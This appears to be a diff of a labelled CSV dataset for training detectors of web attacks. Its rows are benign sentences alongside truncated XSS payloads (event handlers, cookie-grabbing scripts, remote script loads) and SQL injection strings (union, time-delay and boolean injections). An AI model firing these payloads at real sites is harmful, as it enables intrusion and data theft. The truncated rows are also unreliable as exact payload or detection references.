href=""javascript://%0aalert(1)"">XSS</a>",1,XSS,163 -<fieldset onpointerenter=alert(1)>XSS</fieldset>,1,XSS,4999 -While many continental municipalities were becomin,0,normal,25131 ->><marquee><img src=x onerror=confirm(1)></marquee,1,XSS,9558 -"<shadow draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,4714 -"<a target=""x"" href=""xssme?xss=<script>function x(w",1,XSS,9068 -&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE,1,XSS,1432 -"1%"" waitfor delay '0:0:5' and ""%"" = """,2,SQLi,15262 -Join tables where possible.,0,normal,23253 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,12836 -"1"" ) ) ) and make_set ( 8403 = 8403,8899 ) and ( (",2,SQLi,13976 -"A gold version will also follow in ""select countri",0,normal,26438 -"<label onkeyup=""alert(1)"" contenteditable>test</la",1,XSS,7711 -"<aside draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,7737 -"<meter onmouseover=""alert(1)"">test</meter>",1,XSS,4284 -"<figcaption onmouseleave=""alert(1)"">test</figcapti",1,XSS,7532 -"1 ) where 7425 = 7425 union all select null,null,n",2,SQLi,14140 -1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 w,2,SQLi,17070 -select ( case when ( 9732 = 7136 ) then 9732 else ,2,SQLi,13494 -1 exec sp_ (or exec xp_),2,SQLi,10054 -))%20waitfor%20delay%20'0:0:20'%20--,2,SQLi,10852 -"<audio onmouseup=""alert(1)"">test</audio>",1,XSS,3385 -"<sub onmouseenter=""alert(1)"">test</sub>",1,XSS,2840 -Select your swear.,0,normal,24955 -"To partially ameliorate this problem, right click ",0,normal,25263 -I want to select a playlist for the road trip.,0,normal,23847 -"1 ) procedure analyse ( extractvalue ( 9627,concat",2,SQLi,15079 -"1"" ) as ivuv where 5691 = 5691",2,SQLi,19716 -"1"" ) as upyn where 6185 = 6185 union all select nu",2,SQLi,15942 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10596 -Join the band.,0,normal,22789 -1 ) where 7096 = 7096,2,SQLi,15434 -<shadow onpointerdown=alert(1)>XSS</shadow>,1,XSS,2097 -#NAME?,2,SQLi,10196 -The View Mother wavelet option can be used to sele,0,normal,25358 -"<figure onkeyup=""alert(1)"" contenteditable>test</f",1,XSS,8000 -Save up to $400 off select MacBook Pro and iMac,0,normal,25728 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5018 -"-1287"" ) as bbzg where 1475 = 1475 union all selec",2,SQLi,17834 -Specify criteria where needed.,0,normal,23285 -1 and 2620 = 2175,2,SQLi,18995 -1 ) as auly where 4146 = 4146 or elt ( 5873 = 5873,2,SQLi,18285 -1 ) where 9307 = 9307,2,SQLi,20305 -<style onpointerout=alert(1)>XSS</style>,1,XSS,2758 -"<img ondblclick=""alert(1)"">test</img>",1,XSS,6398 -UNION ALL SELECT,2,SQLi,10078 -"-6007"" ) ) union all select 6019,6019,6019,6019,60",2,SQLi,13931 -"Price starts at $318.66, depending on what Mario g",0,normal,25762 -"1"" where 8734 = 8734",2,SQLi,14083 +"<button onmouseover=""alert(1)"">test</button>",1,XSS,5001 +"While you're still online, select the book you wan",0,normal,25128 +""">><marquee><img src=x onerror=confirm(1)></marque",1,XSS,9560 +"<style>@keyframes x{}</style><head style=""animatio",1,XSS,4716 +"<a xmlns:xlink=""http://www.w3.org/1999/xlink"" xlin",1,XSS,9070 +\&quot;;alert(&apos;XSS&apos;);//,1,XSS,1433 +"-5278"" ) ) ) union all select 5264,5264,5264#",2,SQLi,15264 +Index columns where required.,0,normal,23255 +1'|| ( select 'ymez' from dual where 9870 = 9870 o,2,SQLi,12838 +-3044' ) or 4999 = 3051#,2,SQLi,13978 +"{""id"":null,""name"":""Honchkrow""}",0,normal,26875 +"<thead onmouseleave=""alert(1)"">test</thead>",1,XSS,7713 +"<picture ondblclick=""alert(1)"">test</picture>",1,XSS,7739 +"<dl onbeforecut=""alert(1)"" contenteditable>test</d",1,XSS,4286 +"<SCRIPT/ SRC=""http://.rocks/.js""></SCRIPT>",1,XSS,7534 +"1%' ) or 6979 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,14142 +"1"" where 1852 = 1852 union all select null,null,nu",2,SQLi,17072 +"1%' ) ) union all select null,null#",2,SQLi,13496 +1 or 1=1,2,SQLi,10056 +"""))%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10854 +<rtc id=x tabindex=1 onactivate=alert(1)></rtc>,1,XSS,3387 +<svg><noframes onload=alert(1)></noframes>,1,XSS,2841 +Select your pledge.,0,normal,24952 +To purchase an item select the Add To Shopping Bas,0,normal,25260 +I'm thinking of where to take a cooking class.,0,normal,23849 +"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,15081 +"1"" ) ) and ( 3020 = 3020 ) *6703 and ( ( ""njdx"" li",2,SQLi,19718 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,15944 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10598 +Create a mural.,0,normal,22791 +1 ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ,2,SQLi,15436 <rt id=x tabindex=1 onbeforeactivate=alert(1)></rt,1,XSS,2098 -"<style>@keyframes x{}</style><acronym style=""anima",1,XSS,8330 -"1"" ) or 8156 = ( select count ( * ) from generate_",2,SQLi,22009 -"</a>//[""'`-->]]>]</div>",1,XSS,9029 -"<meta draggable=""true"" ondrag=""alert(1)"">test</met",1,XSS,3472 -"-5726%"" ) ) or 6872 = 6872 and ( ( ""%"" = """,2,SQLi,12890 -"1%"" and 3202 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,14473 -1' ) ) ) and ( 5995 = 9618 ) *9618 and ( ( ( 'nagr,2,SQLi,16231 -1' ) ) as nxhp where 2649 = 2649 or 9643 = ( selec,2,SQLi,18556 --8369 ) where 7234 = 7234 order by 1--,2,SQLi,18510 -><<script>alert(document.cookie);//<</script>,1,XSS,1734 -1'+ ( select eztr where 4260 = 4260 and 6537 = dbm,2,SQLi,18395 -"{""id"":null,""firstName"":""Fabian"",""lastName"":""Lau"",""",0,normal,27335 -<marquee><script>alert('XSS')</script></marquee>,1,XSS,1284 -"1,exp ( ~ ( select * from ( select concat ( 0x7171",2,SQLi,12486 -"1' ) and elt ( 3528 = 3566,3566 )",2,SQLi,12449 -select @@servernamee,2,SQLi,10029 --3924'|| ( select 'ssld' from dual where 6229 = 62,2,SQLi,21622 +"<>""'%;)(&+",2,SQLi,10198 +The XLE is the Energy Select Sector SPDR Fund ETF.,0,normal,25355 +<p onblur=alert(1) tabindex=1 id=x></p><input auto,1,XSS,8002 +Save up to 25% off select Grills and Pool Supplies,0,normal,25725 +"<frame onmouseout=""alert(1)"">test</frame>",1,XSS,5020 +"1"" ) ) ) and sleep ( 5 ) and ( ( ( ""bvgg"" = ""bvgg",2,SQLi,17836 +Index columns where applicable.,0,normal,23287 +1' ) ) ) and ( select * from ( select ( sleep ( 5 ,2,SQLi,18997 +"1"" waitfor delay '0:0:5'",2,SQLi,18287 +select ( case when ( 1407 = 2741 ) then 1407 else ,2,SQLi,20307 +"<area draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,2759 +<style>:target {color:red;}</style><content id=x s,1,XSS,6400 +")) or benchmark(10000000,MD5(1))#",2,SQLi,10080 +1' ) ) rlike ( select * from ( select ( sleep ( 5 ,2,SQLi,13933 +"Rabi` to select Ali, knowing that the dislike felt",0,normal,25759 +"-1597"" where 5933 = 5933 or 3038 = 3038",2,SQLi,14085 +<main id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,2099 +<canvas onfocusout=alert(1) tabindex=1 id=x></canv,1,XSS,8332 +"-8487' ) where 9655 = 9655 union all select 9655,9",2,SQLi,22011 +"</html>//[""'`-->]]>]</div>",1,XSS,9031 +<animatetransform onpointerdown=alert(1)>XSS</anim,1,XSS,3474 +1 where 1299 = 1299,2,SQLi,12892 +1' or 5286 = ( select count ( * ) from all_users t,2,SQLi,14475 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,16233 +"-6184"" ) ) or 2724 in ( ( char ( 113 ) +char ( 113",2,SQLi,18558 +"1"" ) ) ) union all select null,null#",2,SQLi,18512 +%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22,1,XSS,1735 +select ( case when ( 2294 = 3651 ) then 2294 else ,2,SQLi,18397 +"{""id"":null,""name"":""coffee""}",0,normal,27334 +"<IMG SRC=\""jav&#x09;ascript:alert('XSS');\"">",1,XSS,1285 +select sleep ( 5 ) and ( ( 'mmvf' like 'mmvf,2,SQLi,12488 +1' ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( ,2,SQLi,12451 +select * from master..sysserverse,2,SQLi,10031 +"-5830 ) or 1570 = convert ( int, ( select char ( 1",2,SQLi,21624 "d=\""alert('XSS');\\"")\"";",1,XSS,1020 --5229' ) ) as tkqp where 9253 = 9253 or 9323 = 932,2,SQLi,16185 -The 33 judges will have a very difficult task to s,0,normal,25487 -"javascript:/*""/*\""/*`/*'/**/ (alert())//</title></",1,XSS,9519 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,19195 -1%' ) and 3707 = ( select count ( * ) from sysibm.,2,SQLi,17521 -"<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert("";XS",1,XSS,1652 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,16187 +The automaker announced today a feature that will ,0,normal,25484 +"javascript:/*`/*'/*'/*""-/*\""/**/ alert()//></title",1,XSS,9521 +"1"" ) and sleep ( 5 ) #",2,SQLi,19197 +"1"" ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ",2,SQLi,17523 +<;SCRIPT SRC=http://ha.ckers.org/xss.js,1,XSS,1653 "<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""h",1,XSS,831 -"<a href=""data:text/html;base64,PHNjcmlwdD5hbGVydCg",1,XSS,1170 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))",2,SQLi,10721 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6257 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5470 -"1' ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( 'u",2,SQLi,16045 -ORDER BY 17--,2,SQLi,10259 -1' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,16064 -1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ,2,SQLi,17252 -or sleep 5,2,SQLi,11167 -"{""id"":null,""name"":""Chansey""}",0,normal,26832 -<fieldset onpointermove=alert(1)>XSS</fieldset>,1,XSS,5094 -"1"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""krxy",2,SQLi,21818 +"<IMG SRC=x onload=""alert(String.fromCharCode(88,83",1,XSS,1171 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10723 +<rb onpointerover=alert(1)>XSS</rb>,1,XSS,6259 +"<element onkeypress=""alert(1)"" contenteditable>tes",1,XSS,5472 +"1"" ) ) ) union all select null,null--",2,SQLi,16047 +ORDER BY 19--,2,SQLi,10261 +"1"" ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121",2,SQLi,16066 +"-2230%"" union all select 3303,3303,3303--",2,SQLi,17254 +or SLEEP(5)=,2,SQLi,11169 +"{""id"":null,""name"":""Jynx""}",0,normal,26829 +"<kbd ondblclick=""alert(1)"">test</kbd>",1,XSS,5096 +1'|| ( select 'zdfo' from dual where 4288 = 4288 u,2,SQLi,21820 "<a href=""javascript\x3A:javascript:alert(1)"" id=""f",1,XSS,542 -"<textarea type=""text"" cols=""50"" rows=""10""></textar",1,XSS,9325 -1 and 4386 = utl_inaddr.get_host_address ( chr ( 1,2,SQLi,17048 -"-1083' ) union all select 9993,9993,9993,9993,9993",2,SQLi,12694 -Merge the customer databases.,0,normal,22739 -1,0,normal,26720 -"<main onkeyup=""alert(1)"" contenteditable>test</mai",1,XSS,3391 -"select * from users where id = 1 union select !<@,",2,SQLi,12081 -",''),/*test*/%26%26%09sLeEp(5)%09--+",2,SQLi,11155 -1' union all select null#,2,SQLi,14227 -"1"" or ( select 9173 from ( select count ( * ) ,con",2,SQLi,16978 -"-1439"" or 2849 = 8484 and ""pmdl"" = ""pmdl",2,SQLi,16030 +<video onloadstart=alert(1)><source>,1,XSS,9327 +select ( case when ( 9746 = 8055 ) then 9746 else ,2,SQLi,17050 +"1%"" ) ) ) and 3707 = ( select count ( * ) from sys",2,SQLi,12696 +Plant some aromatic herbs.,0,normal,22741 +1,0,normal,26717 +"<bgsound ondblclick=""alert(1)"">test</bgsound>",1,XSS,3393 +""" or sleep ( __TIME__ ) = """,2,SQLi,12083 +1 and sleep 5,2,SQLi,11157 +1'|| ( select 'zccb' from dual where 8911 = 8911,2,SQLi,14229 +"1"" ) ) or 9643 = ( select count ( * ) from domain.",2,SQLi,16980 +"-8425"" ) ) or ( 6485 = 1127 ) *1127 and ( ( ""qruf""",2,SQLi,16032 "{""id"":null,""firstName"":""Sing Huat"",""lastName"":""Ong",0,normal,27529 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--",2,SQLi,10776 -#ERROR!,2,SQLi,11006 -"<ins draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,3960 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6644 -translate,0,normal,23226 -"1 ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457",2,SQLi,20816 -"1"" or exp ( ~ ( select * from ( select concat ( 0x",2,SQLi,16101 -1'+ ( select lqhd where 4251 = 4251 and ( 8754 = 5,2,SQLi,16088 -<summary id=x tabindex=1 ondeactivate=alert(1)></s,1,XSS,3587 -Select your importance.,0,normal,24881 -"<sup onmouseleave=""alert(1)"">test</sup>",1,XSS,2564 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10823 -Select stay.,0,normal,24635 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5037 -&#x000003c;,1,XSS,1081 -"<ins onmousedown=""alert(1)"">test</ins>",1,XSS,5892 -select sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,14538 --2055 ) or 3038 = 3038,2,SQLi,21351 -"<link onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,2024 -select pg_sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,13110 -"Dubbed ""?Mixcloud Select,"" the new feature lets li",0,normal,26225 -"<font draggable=""true"" ondrag=""alert(1)"">test</fon",1,XSS,7910 -"On the Consoles with preset Faders, fixtures can b",0,normal,25844 -I'm thinking of where to go for relaxation.,0,normal,23706 -"-7379 union all select 9813,9813,9813,9813,9813,98",2,SQLi,16611 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",2,SQLi,10778 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,11008 +<center id=x tabindex=1 onfocus=alert(1)></center>,1,XSS,3962 +<style>:target {color:red;}</style><shadow id=x st,1,XSS,6646 +coerce,0,normal,23228 +"1 ) ) procedure analyse ( extractvalue ( 5840,conc",2,SQLi,20818 +1' ) ) ) or 8315 = ( select count ( * ) from sysib,2,SQLi,16103 +"1 ) ) union all select null,null,null,null,null--",2,SQLi,16090 +"<input onbeforecopy=alert(1) value=""XSS"" autofocus",1,XSS,3589 +Select your outcome.,0,normal,24878 +<nav onpointerdown=alert(1)>XSS</nav>,1,XSS,2565 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10825 +Select sign.,0,normal,24632 +"<form draggable=""true"" ondrag=""alert(1)"">test</for",1,XSS,5039 +\x3c,1,XSS,1082 +<mark id=x tabindex=1 onactivate=alert(1)></mark>,1,XSS,5894 +"1"" ) and elt ( 6651 = 1172,1172 ) and ( ""zfkb"" lik",2,SQLi,14540 +select ( case when ( 4769 = 4769 ) then 4769 else ,2,SQLi,21353 +"<html onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,2025 +select ( case when ( 4624 = 4844 ) then 4624 else ,2,SQLi,13112 +During the second period of his service in Congres,0,normal,26222 +<main onpointerup=alert(1)>XSS</main>,1,XSS,7912 +Mr. Trump has yet to select nominees for the vacan,0,normal,25874 +I need to select the right book for my reading lis,0,normal,23708 +"1"" ) ) as dcrk where 5164 = 5164 and 2716 = ( sele",2,SQLi,16613 &lt;!&#91;endif&#93;--&gt;,1,XSS,1014 -1'|| ( select 'epjr' from dual where 3074 = 3074 p,2,SQLi,14872 -"1%"" ) or 7552 = ( select count ( * ) from rdb$fiel",2,SQLi,18314 -"<meta http-equiv=""refresh"" content=""0;javascript&c",1,XSS,9236 -<q onpointerout=alert(1)>XSS</q>,1,XSS,5252 -<button onCut=javascript:alert(1)>,1,XSS,9597 -<audio onpointerdown=alert(1)>XSS</audio>,1,XSS,2180 -"1"" ) and 6537 = dbms_pipe.receive_message ( chr ( ",2,SQLi,17082 -1' and 8189 = ( select count ( * ) from sysibm.sys,2,SQLi,17509 -Let's find out where the nearest pharmacy is.,0,normal,23763 -"1%' ) ) union all select null,null,null,null,null#",2,SQLi,12088 -1' ) ) ) and 8407 = ( select count ( * ) from gene,2,SQLi,21574 -<embed onpointerenter=alert(1)>XSS</embed>,1,XSS,5111 -Randomly select a card.,0,normal,24287 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1779 -Select hate.,0,normal,24741 -1'+ ( select 'asdq' where 4023 = 4023 and make_set,2,SQLi,19019 -"1"" ) rlike ( select ( case when ( 5746 = 5367 ) th",2,SQLi,15380 -I need to select the right outfit for the occasion,0,normal,23929 -"<li onmouseleave=""alert(1)"">test</li>",1,XSS,7605 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19874 -1'+ ( select kfmv where 1679 = 1679,2,SQLi,13945 -1 where 4319 = 4319 and 8635 = ( select count ( * ,2,SQLi,17422 -Select your float.,0,normal,25025 +"1"" where 3247 = 3247 or 1022 = ( select count ( * ",2,SQLi,14874 +-6200' ) ) as jjpz where 4490 = 4490 union all sel,2,SQLi,18316 +"<object data=""http://corkami.googlecode.com/svn/!s",1,XSS,9238 +"<bdi oncopy=""alert(1)"" contenteditable>test</bdi>",1,XSS,5254 +<button onDataSetChanged=javascript:alert(1)>,1,XSS,9599 +"<svg onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,2181 +1' and 8407 = ( select count ( * ) from generate_s,2,SQLi,17084 +"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,17511 +Where's the perfect spot to watch the sunrise?,0,normal,23765 +1 ) as boed where 6787 = 6787,2,SQLi,12090 +1 ) ) as qlkf where 6635 = 6635,2,SQLi,21576 +<u onpointerover=alert(1)>XSS</u>,1,XSS,5113 +Select the correct answer.,0,normal,24289 +"<image onclick=""alert(1)"">test</image>",1,XSS,1780 +Select help.,0,normal,24738 +-4896' ) union all select 1929--,2,SQLi,19021 +1' ) ) ) and 3754 = ( select upper ( xmltype ( chr,2,SQLi,15382 +Let's explore where the hiking trail ends.,0,normal,23931 +"<br onmouseout=""alert(1)"">test</br>",1,XSS,7607 +1'+ ( select 'xbyn' where 6881 = 6881,2,SQLi,19876 +-8234' ) ) ) or 9323 = 9323#,2,SQLi,13947 +1'|| ( select 'hshf' where 9073 = 9073 and 7533 = ,2,SQLi,17424 +Select your slide.,0,normal,25022 "{""id"":null,""firstName"":""Eevee"",""lastName"":""Yeo"",""s",0,normal,27537 -"-9297 ) union all select 6841,6841,6841,6841,6841-",2,SQLi,19034 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10474 -1%' ) ) and ( select 9067 from ( select count ( * ,2,SQLi,14934 -1' ) and 2305 = 1934,2,SQLi,19364 -"-5145' where 2334 = 2334 union all select 2334,233",2,SQLi,18932 -"<ruby ondblclick=""alert(1)"">test</ruby>",1,XSS,5133 -<summary onpointerdown=alert(1)>XSS</summary>,1,XSS,2160 -1 SELECT pg_sleep(5);,2,SQLi,11330 -"-6611%"" ) ) ) union all select 8918,8918#",2,SQLi,14043 -1 ) ) as xsyk where 2575 = 2575 or 8156 = ( select,2,SQLi,14567 -<em id=x tabindex=1 onbeforeactivate=alert(1)></em,1,XSS,6446 -"<canvas ondblclick=""alert(1)"">test</canvas>",1,XSS,3968 -&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#000011,1,XSS,1429 -"<SCRIPT a="">"" '' SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,3082 -<hgroup id=x tabindex=1 onactivate=alert(1)></hgro,1,XSS,2521 -select * from users where id = '1' union select @ ,2,SQLi,11755 -"Please, select wisely.",0,normal,24418 -union (select @@version) --,2,SQLi,10048 -Save up to 40% off select Mr. Beams Lighting Produ,0,normal,25712 -Select your beat.,0,normal,25013 -<svg><head onload=alert(1)></head>,1,XSS,6020 -1%' and sleep ( 5 ) and '%' = ',2,SQLi,16833 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,16899 -"-9175' ) ) union all select 6174,6174,6174,6174--",2,SQLi,22380 -Order a cheesy pizza.,0,normal,22657 -<ol id=x tabindex=1 onbeforeactivate=alert(1)></ol,1,XSS,3728 -I'm considering where to spend the weekend.,0,normal,23738 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8554 -Where's the missing puzzle piece?,0,normal,22664 -"From the F o rmat menu, select T abs... The Tabs d",0,normal,26160 -I need to decide where to plant new flowers.,0,normal,23680 -"javascript:""/*'//`//\""//</template/</title/</texta",1,XSS,9497 -"<image onmouseenter=""alert(1)"">test</image>",1,XSS,6252 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5927 -1'+ ( select 'yhcf' where 8367 = 8367,2,SQLi,18845 -"1"" ) ) ) and elt ( 1750 = 7826,7826 ) and ( ( ( ""q",2,SQLi,16407 -1' ) ) as cwss where 9720 = 9720,2,SQLi,18451 -"-5911 union all select 2245,2245,2245,2245,2245,22",2,SQLi,18038 -<header id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,8895 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8707 -&lt;DIV STYLE=&quot;background-image: url(&amp;#1;,1,XSS,1377 -�><s�%2b�cript>alert(document.cookie)</script>,1,XSS,1725 -"<span onmouseover=""alert(1)"">test</span>",1,XSS,3755 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10518 -"1%"" ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ",2,SQLi,20568 -"Click ""Check for updates"" and select the update if",0,normal,26283 -"<figure draggable=""true"" ondrag=""alert(1)"">test</f",1,XSS,4083 -select * from users where id = '1' or $<\. union s,2,SQLi,11871 -"The governing body consisted of 180 members, chose",0,normal,25438 -Update your travel plans for the trip.,0,normal,22964 -( select ( case when ( 1570 = 6977 ) then 1 else 1,2,SQLi,20943 -"1"" where 4808 = 4808 union all select null,null,nu",2,SQLi,12501 -1 ) ) or 2367 = ( select count ( * ) from rdb$fiel,2,SQLi,13058 -"1"" or updatexml ( 1808,concat ( 0x2e,0x7171706a71,",2,SQLi,19922 --9574' ) as rxym where 4719 = 4719 union all selec,2,SQLi,16141 -Where's the table stored?,0,normal,23388 -UNION ALL SELECT 'INJ'||'ECT'||'XXX'--,2,SQLi,10774 -1' ) as eyzk where 2489 = 2489 and 4386 = utl_inad,2,SQLi,20715 -and 'one'='one–,2,SQLi,9952 -"1"" ) as vpna where 5450 = 5450 or char ( 75 ) ||ch",2,SQLi,14572 -select case when 5308 = 6745 then 1 else null end-,2,SQLi,17031 -Modify your settings.,0,normal,22766 -Where did you find that calming garden?,0,normal,23912 -"{""id"":null,""name"":""Serperior""}",0,normal,27207 -"1%"" and 8189 = ( select count ( * ) from sysibm.sy",2,SQLi,14216 -"1"" where 1452 = 1452 union all select null,null,nu",2,SQLi,15998 -<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr,1,XSS,7166 -Select hatch.,0,normal,24750 -Select a fragrance for your laundry.,0,normal,24082 -#ERROR!,2,SQLi,11183 -"{""id"":null,""firstName"":""Gin Ying"",""lastName"":""Ho"",",0,normal,26816 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4876 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10737 -Select an item from the list by checking the check,0,normal,25649 -select ( case when ( 3444 = 8424 ) then 3444 else ,2,SQLi,15991 -1' ) ) or 2633 = dbms_pipe.receive_message ( chr (,2,SQLi,21726 -"1 where 1096 = 1096 and extractvalue ( 7982,concat",2,SQLi,12259 -Where's your SQL dataset?,0,normal,23416 -"1 ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,18545 -"<img src onerror /"" '""= alt=javascript:alert(1)//""",1,XSS,686 -select * from users where id = 1 + $+*$ union sele,2,SQLi,11436 -The film will be screening for free in select thea,0,normal,25449 -1' or sleep ( 5 ) #,2,SQLi,14292 -"<style>@keyframes slidein {}</style><q style=""anim",1,XSS,2462 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,12276 -x' or 1 = 1 or 'x' = 'y,2,SQLi,11890 -"<STYLE type=""text/css"">BODY{background:url(""javasc",1,XSS,7129 --3960' or 9323 = 9323#,2,SQLi,16378 -Create a soothing melody.,0,normal,22652 -"iif ( 4836 = 1823,1,1/0 )",2,SQLi,21326 -"<button onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,5947 -<meter onfocusout=alert(1) tabindex=1 id=x></meter,1,XSS,4584 -"1%' ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a",2,SQLi,22169 -"1%' ) ) ) or row ( 1045,7562 ) > ( select count ( ",2,SQLi,12233 -Where can I select a book for my book club?,0,normal,23954 -1%' ) ) and 3580 = ( select count ( * ) from domai,2,SQLi,13071 -1 and exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,16906 -"Get $100 off select PlayStation 4 consoles, $100-$",0,normal,26150 -"<progress draggable=""true"" ondragenter=""alert(1)"">",1,XSS,3984 -"1%"" ) ) union all select null--",2,SQLi,14687 -"<meta onmousemove=""alert(1)"">test</meta>",1,XSS,6304 -admin'or 1=1 or ''=',2,SQLi,9909 +"1' where 3760 = 3760 union all select null,null,nu",2,SQLi,19036 +"ORDER BY 1,SLEEP(5)--",2,SQLi,10476 +"1"" ) ) as ynuw where 9138 = 9138",2,SQLi,14936 +"1', ( select ( case when ( 7616 = 7616 ) then 1 el",2,SQLi,19366 +"-5245' or elt ( 1032 = 1032,3623 ) and 'qfvo' = 'q",2,SQLi,18934 +"<br onkeydown=""alert(1)"" contenteditable>test</br>",1,XSS,5135 +<em id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,2161 +(SELECT pg_sleep(5)),2,SQLi,11332 +1' ) ) as hrra where 9533 = 9533 and char ( 111 ) ,2,SQLi,14045 +select sleep ( 5 ) and 'eskp' like 'eskp,2,SQLi,14569 +"<object onmousemove=""alert(1)"">test</object>",1,XSS,6448 +"<tr onmouseout=""alert(1)"">test</tr>",1,XSS,3970 +&lt;DIV STYLE=&quot;background-image:\0075\0072\00,1,XSS,1430 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3083 +"<wbr onmouseout=""alert(1)"">test</wbr>",1,XSS,2522 +"select * from users where id = 1 or 1#"", union sel",2,SQLi,11757 +Select dessert first.,0,normal,24420 +"union (select NULL, NULL, (select @@version)) --",2,SQLi,10050 +Save up to 55% off select Muscle Tech Sports Nutri,0,normal,25709 +"Olsen, who joined M&G in April 2014, will remain m",0,normal,25853 +<picture onpointerout=alert(1)>XSS</picture>,1,XSS,6022 +1%' ) and ( 3020 = 3020 ) *6703 and ( '%' = ',2,SQLi,16835 +1%' ) ) ) and 8635 = ( select count ( * ) from gen,2,SQLi,16901 +"1, ( select ( case when ( 5334 = 4976 ) then 1 els",2,SQLi,22382 +Update the social media status.,0,normal,22659 +<discard onpointerdown=alert(1)>XSS</discard>,1,XSS,3730 +Where can I select a gift for my nephew?,0,normal,23740 +"<th onkeydown=""alert(1)"" contenteditable>test</th>",1,XSS,8556 +Insert the USB cable.,0,normal,22666 +"From the menu that comes up, select the option ' D",0,normal,26157 +I want to select a book to read during my vacation,0,normal,23682 +"javascript:`</template>\""///""//</script/--></title",1,XSS,9499 +"<optgroup onmouseleave=""alert(1)"">test</optgroup>",1,XSS,6254 +<select onpointerout=alert(1)>XSS</select>,1,XSS,5929 +1' in boolean mode ) or 2367 = ( select count ( * ,2,SQLi,18847 +1' ) ) as babx where 2494 = 2494 or 1022 = ( selec,2,SQLi,16409 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18453 +-8099%' ) ) or 4747 = dbms_utility.sqlid_to_sqlhas,2,SQLi,18040 +<i onfocusout=alert(1) tabindex=1 id=x></i><input ,1,XSS,8897 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8709 +&lt;DIV STYLE=&quot;width: expression(alert(&apos;,1,XSS,1378 +<BODY BACKGROUND=�javascript:alert(�XSS�)�>,1,XSS,1726 +"<acronym onmouseenter=""alert(1)"">test</acronym>",1,XSS,3757 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10520 +1' ) and 8407 = ( select count ( * ) from generate,2,SQLi,20570 +"Click ""Select all,"" and then click the icon again ",0,normal,26280 +"<strong oncopy=""alert(1)"" contenteditable>test</st",1,XSS,4085 +"select * from users where id = 1 or ""_;"" or 1 = 1 ",2,SQLi,11873 +The guards force the inmates to select a shawish (,0,normal,25435 +Insert the new batteries into the device.,0,normal,22966 